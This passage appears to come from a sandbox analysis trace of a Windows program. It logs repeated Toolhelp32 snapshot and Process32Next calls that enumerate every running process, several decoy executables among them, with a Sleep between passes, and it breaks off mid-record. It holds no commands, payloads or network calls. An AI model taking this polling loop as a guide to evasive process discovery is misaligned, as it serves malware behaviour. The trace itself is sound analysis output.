hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0108.949] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0108.950] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0108.951] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0108.952] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0108.953] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0108.954] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0108.955] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0108.956] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0108.957] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0108.958] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0108.959] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.960] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0108.961] CloseHandle (hObject=0xc4) returned 1 [0108.961] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0108.966] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0108.966] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 
[0108.967] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0108.968] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0108.968] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0108.969] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0108.969] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0108.970] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0108.971] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0108.971] 
Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0108.972] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.973] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.973] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.974] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.975] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.975] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0108.976] 
Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.977] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.977] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0108.979] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.980] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0108.981] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0108.982] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0108.983] 
Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0108.984] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.985] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0108.986] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0108.988] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0108.989] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0108.990] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="xplivecam.exe")) returned 1 [0109.008] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0109.009] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0109.010] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0109.012] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0109.013] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0109.014] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0109.016] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, 
dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0109.020] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0109.021] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0109.023] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0109.026] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0109.027] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0109.028] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0109.029] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 
th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0109.031] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0109.032] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0109.033] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.034] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0109.036] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0109.037] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0109.038] CloseHandle (hObject=0xbc) returned 1 [0109.038] Sleep (dwMilliseconds=0x12c) [0109.354] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0109.360] 
Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0109.360] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0109.361] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0109.362] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0109.363] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0109.364] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0109.365] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0109.366] Process32NextW (in: 
hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0109.367] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0109.367] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0109.368] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.369] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.370] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.374] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.375] Process32NextW (in: 
hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.376] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0109.377] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.378] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.379] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, 